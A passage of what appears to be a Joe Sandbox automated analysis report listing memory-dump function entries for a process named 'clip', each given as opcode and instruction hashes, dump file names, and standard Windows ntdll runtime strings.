• Opcode Fuzzy Hash: e21e5599e77d0b3030ac2c26f08b3f02c1470486f86e0247d50bf999fa943887
• Instruction Fuzzy Hash: 4CF0BE31A166E09FE73ADF68C144B22B7D89F20734F08B96AD88D87561E736F880C651
Memory Dump Source
• Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
• Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3feeff870987a6879b54c52f43281bcbab73424f801b3b4aa5e8e78c050d1409
• Instruction ID: 71bea6963496d9463db4873e04ad4c71b41e295d2c77291fcd6871f040593e33
• Opcode Fuzzy Hash: 3feeff870987a6879b54c52f43281bcbab73424f801b3b4aa5e8e78c050d1409
• Instruction Fuzzy Hash: 31F0272B41568046FF255F3879502912B75DB8991CF0A3449D8B267600C578BCE3C320
Memory Dump Source
• Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
• Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6ed86600c0f063b5e2e7c4017a10fb342a0aa9d2c9789baae96b9aa117515cb
• Instruction ID: 990bd00a45f92b02afc014e7482c9d60368b6404782e661cc3d2d2863cae3677
• Opcode Fuzzy Hash: e6ed86600c0f063b5e2e7c4017a10fb342a0aa9d2c9789baae96b9aa117515cb
• Instruction Fuzzy Hash: 97F0E2716136609FF7A29B18C24CBA173D89BC47A4F0FF535D44687562C67CF880CA51
Memory Dump Source
• Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
• Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
• Instruction ID: 746035b2415d0208dd78baa792ccdd4cc6ae53984bee733e668c6271e794a397
• Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
• Instruction Fuzzy Hash: B3E0D8723006006BF7119E59CCC0F57776EDFC2B14F040479B9045F261CAE2ED0986A4
Memory Dump Source
• Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
• Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f46762a526c90128599685f74b5d31dfee137a2094753815aa38afb8c7f49694
• Instruction ID: d860c67dad44e443db111abe02f826e8247aadda3061add4e1f73d6c98805c80
• Opcode Fuzzy Hash: f46762a526c90128599685f74b5d31dfee137a2094753815aa38afb8c7f49694
• Instruction Fuzzy Hash: 8BF0A770A01658ABEB04DBB9D545F9E77B8EF08308F501054E901EB3D1EA38FD00C758
Memory Dump Source
• Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
• Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ba75ea3ef90b484be523c907d67505c8287f3cf1de5e60397294a8be4395c64f
• Instruction ID: 64dbe66e450df50bea594df6e09b094effb71752b1c36ee1f1c64071f027ff74
• Opcode Fuzzy Hash: ba75ea3ef90b484be523c907d67505c8287f3cf1de5e60397294a8be4395c64f
• Instruction Fuzzy Hash: 8FF0A770A11648ABEB04EBB9D655F9E77B8EF08308F501058E902EB2D1EA34FD00CB18
Memory Dump Source
• Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
• Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f2d720608c50c9f187b713363836a3d931637fb52f062833b4b8cc8d38322ab0
• Instruction ID: 1de3ff8833ada9b35a5b1f1b8eefa0f070cf102aca8413e21067a91e42fc31e0
• Opcode Fuzzy Hash: f2d720608c50c9f187b713363836a3d931637fb52f062833b4b8cc8d38322ab0
• Instruction Fuzzy Hash: 4AF0A771A40348ABEB08DBB9D555F9E77B8EF08744F401058E902EB2D1E974FD418718
Memory Dump Source
• Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
• Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
• Instruction ID: dc2330a070824a4e6ec1fbdb55cc47ea5312d862fb64c32493bbae85f4919ffc
• Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
• Instruction Fuzzy Hash: DFF0E53350462467D230AA198C05F5BFBACDBD5B74F20031ABA249B1E0DA70A911C7D6
Memory Dump Source
• Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
• Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 529ccb82c991b7800ab2546dc1dfe10324f4fc34d1a72173ea6f4d7ac28c728f
• Instruction ID: f553da4616b8b5a1d5c24399170a706e09d443e0ad9f0e99fca628924cd4dfdb
• Opcode Fuzzy Hash: 529ccb82c991b7800ab2546dc1dfe10324f4fc34d1a72173ea6f4d7ac28c728f
• Instruction Fuzzy Hash: FBF08271A11258ABEB04EBF9D605F6E73B8EF04308F541059AD01EB2D1EA74F900C758
Memory Dump Source
• Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
• Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
• Instruction ID: 801e202b9fe5a568e302e2f35a62ede09aa00895e462d09a2e4ff91b111d9867
• Opcode Fuzzy Hash: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
• Instruction Fuzzy Hash: 93E0E533540614BBD7211E16D800F66FBA9FF90BB0F108119A559179909764B811DED4
Memory Dump Source
• Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                  • Instruction ID: aa78b3237fa4d9f97e7e4c6d3af0e548428c41ba5c17143f885a6d122181bd02
                                                  • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                  • Instruction Fuzzy Hash: 01F0E5393087459FEB1DDF25C040A957BB8EB41350B006054EC428B751E731F981CB40
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                  • Instruction ID: 54d15c49ba26408867470081ae7b7f5959e3b0a346010c8642610dde606f779a
                                                  • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                  • Instruction Fuzzy Hash: 7DE06DB2211620ABE764DB59CE05FA673ACEB04720F540258B925930E0DAB0BE40CA60
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1e42fafe5fdbd2cd5b10f9b0a4a5b4120ab570b8419386f81cb1d165a79f303e
                                                  • Instruction ID: 4e7aeb960496efde1e437a4f10d6d68e44ca113e7c08732fcb3e73a1650763cd
                                                  • Opcode Fuzzy Hash: 1e42fafe5fdbd2cd5b10f9b0a4a5b4120ab570b8419386f81cb1d165a79f303e
                                                  • Instruction Fuzzy Hash: C8E092321006549BE715FF29DD01F8B7B9AEF54368F014515B515571A0CA34BC60C7C4
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                  • Instruction ID: 491156698efce16b309fc20178c43d38e429f6e022797c24fdd14a329760b974
                                                  • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                  • Instruction Fuzzy Hash: 5DE0AE343042059FDB15CF19C040B62B7A6BFE5B10F28C068A8488F306EB32A8438A40
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f7ad52954fa9bb938e97a20564faeea2fb5741f47f4a473d8e562e188841c31b
                                                  • Instruction ID: d7892aa062d724ad734589f67c662c2318e1751ce7297895eed6473818bb4f6a
                                                  • Opcode Fuzzy Hash: f7ad52954fa9bb938e97a20564faeea2fb5741f47f4a473d8e562e188841c31b
                                                  • Instruction Fuzzy Hash: 38E08C321005606BE215FA6DDE10F4A779AEFA8264F010121B551972A0CA68BC50C794
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                  • Instruction ID: 55dee0646a142e8c249644521d990a102de4a203ea2da48d467beea33890f0eb
                                                  • Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                  • Instruction Fuzzy Hash: 5CD05E31161660EFE7326F25EE05F87BAB5EF80B14F0516A8B001264F086A5FD94CA90
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                  • Instruction ID: 0e008d93bf1be5670bd5f23c7e002c66a6770c44d787c6c5a05d8c5efd386e9a
                                                  • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                  • Instruction Fuzzy Hash: 09D0A932204620ABE732AE2CFC00FD373E8AF88720F060459B008C7050C364BC81CA84
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                  • Instruction ID: 28079ccca1eed9339f9f69cef63b34a9f07bfd5e1e030a63f6657890af011eb9
                                                  • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                  • Instruction Fuzzy Hash: B4D02232312030A3CB286A617920F6379099F80BA4F0A022C380A93C40C0089C42E2E0
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                  • Instruction ID: 3c43b83c37d729651dd5f48b69f469b30c37f480815eefe1c20c0c959cfcfa49
                                                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                  • Instruction Fuzzy Hash: 0AC08C33290658AFD712EFA8CE01F027BA9EB9CB50F000021F7048B670C635FC20EA84
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                  • Instruction ID: c62c07373c0aaab71302367dea29eb9bf0e3f6e08a4dcc29521348603ca6229f
                                                  • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                  • Instruction Fuzzy Hash: FFC08C701455906AEB2B5B50CA00B283650AF0471BFA4219CAE40A94A1C36CB8128218
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                  • Instruction ID: 28f072799396b40a4e000fe6c7cf503037ddc7f9fb36de5a28e8a9c2c513b820
                                                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                  • Instruction Fuzzy Hash: F5C04879701A428FDF15DF2AD394F4977E4FB84745F156890E806CBB26E628F805CA10
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                  • API String ID: 48624451-2108815105
                                                  • Opcode ID: 24b263eda04a7e8456915146079ad79857f3e6a0ebd82de4cf1ae4c823a7dd69
                                                  • Instruction ID: 508272ff550c7bbe40a342cf0a1fb9df865d259e715fdeeea702a98345532892
                                                  • Opcode Fuzzy Hash: 24b263eda04a7e8456915146079ad79857f3e6a0ebd82de4cf1ae4c823a7dd69
                                                  • Instruction Fuzzy Hash: 5D51D8B5B046167FDB10EF98899097FF7B8BF08204754926AE8A5D7641E234FE508FE0
                                                  Strings
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04384742
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04384655
                                                  • ExecuteOptions, xrefs: 043846A0
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04384725
                                                  • Execute=1, xrefs: 04384713
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 04384787
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 043846FC
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 0-484625025
                                                  • Opcode ID: 42b574875d2878a2594de856179d3138dd967cdc9dc5a79b9e348c13a7dbbb85
                                                  • Instruction ID: cc3252e6ba914747a82244450a748728545c9acac75fb92b087a4062919a606e
                                                  • Opcode Fuzzy Hash: 42b574875d2878a2594de856179d3138dd967cdc9dc5a79b9e348c13a7dbbb85
                                                  • Instruction Fuzzy Hash: C251F431700219AAFF14AEA4DC85FFAB7EDEF94304F4410A9E905A7190EB71BE458F50
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-$0$0
                                                  • API String ID: 1302938615-699404926
                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                  • Instruction ID: eb6e7fc25db8f55a8e6cdd2912dcff62849376089d7e521e65bdf6f534c7d5ab
                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                  • Instruction Fuzzy Hash: 8F81A070E052899EEF288E68C891FFEFBB5AF45350F186559DC61A72A0D734B8408B64
                                                  Strings
                                                  • RTL: Resource at %p, xrefs: 04387B8E
                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04387B7F
                                                  • RTL: Re-Waiting, xrefs: 04387BAC
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 0-871070163
                                                  • Opcode ID: 1d2e1c64ff8957148c765703f5c96237420129914e66acfe7258d5e14d79af93
                                                  • Instruction ID: 89946b68d318980a09160dd93959fab862ab7eceb2a38100f1959f8ff5962d88
                                                  • Opcode Fuzzy Hash: 1d2e1c64ff8957148c765703f5c96237420129914e66acfe7258d5e14d79af93
                                                  • Instruction Fuzzy Hash: F641BF353017029FDB24DE258C40BAAF7E6EFC8710F101A2DE95A9B680DB31F9458BA1
                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0438728C
                                                  Strings
                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04387294
                                                  • RTL: Resource at %p, xrefs: 043872A3
                                                  • RTL: Re-Waiting, xrefs: 043872C1
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 885266447-605551621
                                                  • Opcode ID: 5ff57d8c5069c64b79b64d77857c345858c0c0014f6ab74a18936b669abd6c21
                                                  • Instruction ID: b512bcceb9c2ad92d7a66542dbeca3a955b163ee43726def1204a0cd930c27eb
                                                  • Opcode Fuzzy Hash: 5ff57d8c5069c64b79b64d77857c345858c0c0014f6ab74a18936b669abd6c21
                                                  • Instruction Fuzzy Hash: B041AE35700706ABEB20EE25CC41B6AF7E6EF84714F242619F995EB640DB31F8528BD1
